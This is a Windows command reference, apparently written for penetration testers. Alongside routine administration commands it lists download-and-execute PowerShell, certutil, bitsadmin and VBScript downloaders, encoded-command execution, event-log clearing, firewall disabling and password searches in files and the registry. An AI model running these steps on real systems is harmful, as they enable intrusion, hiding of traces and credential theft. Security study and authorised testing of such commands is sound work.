Windows Commands

System Information

# System info
systeminfo
hostname
ver

# OS information
wmic os get caption,version,buildnumber,osarchitecture
Get-ComputerInfo (PowerShell)

# Environment variables
set
echo %PATH%
$env:PATH (PowerShell)

# Architecture
wmic cpu get caption,deviceid,name,numberofcores
echo %PROCESSOR_ARCHITECTURE%

User Information

# Current user
whoami
whoami /all
whoami /priv

# List users
net user
net user <username>
wmic useraccount list full

# Local groups
net localgroup
net localgroup administrators

# Domain information
net user /domain
net group /domain
net group "Domain Admins" /domain

Network Information

# IP configuration
ipconfig
ipconfig /all

# Routing table
route print
netstat -r

# Network connections
netstat -ano
netstat -anob

# ARP table
arp -a

# DNS cache
ipconfig /displaydns
ipconfig /flushdns

# Hosts file
type C:\Windows\System32\drivers\etc\hosts

# Firewall
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all

Process Management

# List processes
tasklist
tasklist /v
wmic process list full
Get-Process (PowerShell)

# Kill process
taskkill /PID <pid>
taskkill /IM process.exe
taskkill /F /IM process.exe  # Force
Stop-Process -Id <pid> (PowerShell)

# Start process
start process.exe
Start-Process process.exe (PowerShell)

File Operations

# Directory listing
dir
dir /a  # Show hidden
dir /s  # Recursive
Get-ChildItem (PowerShell)
Get-ChildItem -Force  # Show hidden
Get-ChildItem -Recurse

# Find files
dir /s file.txt
where /r C:\ file.txt
Get-ChildItem -Path C:\ -Filter file.txt -Recurse

# Search for text in files
findstr /si "password" *.txt
findstr /si "password" *.config
Get-ChildItem -Recurse | Select-String "password"

# File permissions
icacls file.txt
icacls C:\folder /grant Everyone:F

# Copy/Move
copy file.txt C:\destination\
xcopy /s /e source dest
robocopy source dest /E
move file.txt C:\destination\

# Delete
del file.txt
del /f /q file.txt  # Force, quiet
rmdir /s /q directory

# Create directory
mkdir directory
md directory
New-Item -ItemType Directory -Path C:\directory (PowerShell)

# File attributes
attrib file.txt
attrib +h file.txt  # Hidden
attrib -h file.txt  # Unhide

Service Management

# List services
sc query
sc query state= all
wmic service list brief
Get-Service (PowerShell)

# Service details
sc qc <service_name>
Get-Service <service_name> | Format-List (PowerShell)

# Start/Stop service
sc start <service_name>
sc stop <service_name>
net start <service_name>
net stop <service_name>
Start-Service <service_name> (PowerShell)
Stop-Service <service_name> (PowerShell)

# Service configuration
sc config <service_name> start= auto
sc config <service_name> binpath= "C:\path\to\binary.exe"

Scheduled Tasks

# List tasks
schtasks /query
schtasks /query /fo LIST /v
Get-ScheduledTask (PowerShell)

# Create task
schtasks /create /tn "TaskName" /tr "C:\path\to\program.exe" /sc daily /st 12:00

# Delete task
schtasks /delete /tn "TaskName"

# Run task
schtasks /run /tn "TaskName"

Registry

# Query
reg query HKLM\Software\Microsoft\Windows\CurrentVersion
reg query HKCU\Software

# Add value
reg add "HKLM\Software\Test" /v TestValue /t REG_SZ /d "Data"

# Delete
reg delete "HKLM\Software\Test" /v TestValue

# Export
reg export HKLM\Software\Test export.reg

# Import
reg import import.reg

# PowerShell
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion"
New-ItemProperty -Path "HKLM:\Software\Test" -Name "TestValue" -Value "Data"

PowerShell

# Execution policy
Get-ExecutionPolicy
Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Bypass -Scope Process

# Run script
powershell -File script.ps1
powershell -ExecutionPolicy Bypass -File script.ps1

# Run command
powershell -Command "Get-Process"

# Encoded command
$command = 'Get-Process'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encodedCommand

# Download file
Invoke-WebRequest -Uri http://example.com/file.txt -OutFile C:\file.txt
wget http://example.com/file.txt -OutFile C:\file.txt
iwr http://example.com/file.txt -OutFile C:\file.txt

# Download and execute
IEX (New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')

# Get command history
Get-History
(Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath

Event Logs

# List logs
wevtutil el
Get-EventLog -List (PowerShell)

# Query log
wevtutil qe Security /f:text
wevtutil qe System /c:10 /rd:true /f:text
Get-EventLog -LogName System -Newest 10 (PowerShell)
Get-WinEvent -LogName Security -MaxEvents 10 (PowerShell)

# Clear logs
wevtutil cl System
wevtutil cl Security
Clear-EventLog -LogName System (PowerShell)

# Filter events
wevtutil qe Security /q:"*[System[(EventID=4624)]]" /f:text
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624} (PowerShell)

Firewall

# Status
netsh advfirewall show allprofiles
Get-NetFirewallProfile (PowerShell)

# Add rule
netsh advfirewall firewall add rule name="Allow Port 80" dir=in action=allow protocol=TCP localport=80
New-NetFirewallRule -DisplayName "Allow Port 80" -Direction Inbound -Protocol TCP -LocalPort 80 -Action Allow (PowerShell)

# Delete rule
netsh advfirewall firewall delete rule name="Allow Port 80"
Remove-NetFirewallRule -DisplayName "Allow Port 80" (PowerShell)

# Disable firewall
netsh advfirewall set allprofiles state off
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False (PowerShell)

File Download

# Certutil
certutil -urlcache -f http://example.com/file.exe file.exe

# BITSAdmin
bitsadmin /transfer mydownload /download /priority high http://example.com/file.exe C:\file.exe

# PowerShell
Invoke-WebRequest -Uri http://example.com/file.exe -OutFile C:\file.exe
(New-Object System.Net.WebClient).DownloadFile('http://example.com/file.exe', 'C:\file.exe')

# VBScript
echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>download.vbs
echo objXMLHTTP.open "GET","http://example.com/file.exe",False>>download.vbs
echo objXMLHTTP.send()>>download.vbs
echo Set objADOStream=CreateObject("ADODB.Stream")>>download.vbs
echo objADOStream.Open>>download.vbs
echo objADOStream.Type=1>>download.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody>>download.vbs
echo objADOStream.Position=0>>download.vbs
echo objADOStream.SaveToFile "C:\file.exe">>download.vbs
echo objADOStream.Close>>download.vbs
cscript download.vbs

Network Shares

# List shares
net share
net view \\computername
wmic share list brief

# Map drive
net use Z: \\server\share
net use Z: \\server\share /user:username password

# Disconnect
net use Z: /delete
net use * /delete

# Access share
\\server\share\file.txt

Active Directory

# Domain info
echo %USERDOMAIN%
echo %LOGONSERVER%

# Domain users
net user /domain
dsquery user

# Domain groups
net group /domain
dsquery group

# Domain computers
net group "Domain Computers" /domain
dsquery computer

# Group members
net group "Domain Admins" /domain

Credential Management

# Saved credentials
cmdkey /list

# Add credential
cmdkey /add:server /user:username /pass:password

# Delete credential
cmdkey /delete:server

# RunAs
runas /user:domain\user "cmd.exe"
runas /netonly /user:domain\user "cmd.exe"

Miscellaneous

# Command history
doskey /history
F7 (interactive)

# Clear screen
cls

# Calculate hash
certutil -hashfile file.txt MD5
certutil -hashfile file.txt SHA256
Get-FileHash file.txt (PowerShell)

# Base64
certutil -encode file.txt file.b64
certutil -decode file.b64 file.txt
[Convert]::ToBase64String([IO.File]::ReadAllBytes("file.txt")) (PowerShell)
[IO.File]::WriteAllBytes("file.txt", [Convert]::FromBase64String("BASE64")) (PowerShell)

# Alternate Data Streams
dir /r
Get-Item -Path file.txt -Stream *
notepad file.txt:hidden.txt

# Shutdown/Restart
shutdown /s /t 0
shutdown /r /t 0
shutdown /a  # Abort

Useful One-liners

# Find writeable directories
dir /s /a C:\ | findstr /i "Everyone" | findstr /i "BUILTIN\Users"

# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Find config files
dir /s *pass* == *cred* == *vnc* == *.config*

# Installed programs
wmic product get name,version
dir "C:\Program Files"
dir "C:\Program Files (x86)"

# Auto-start programs
wmic startup list full
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run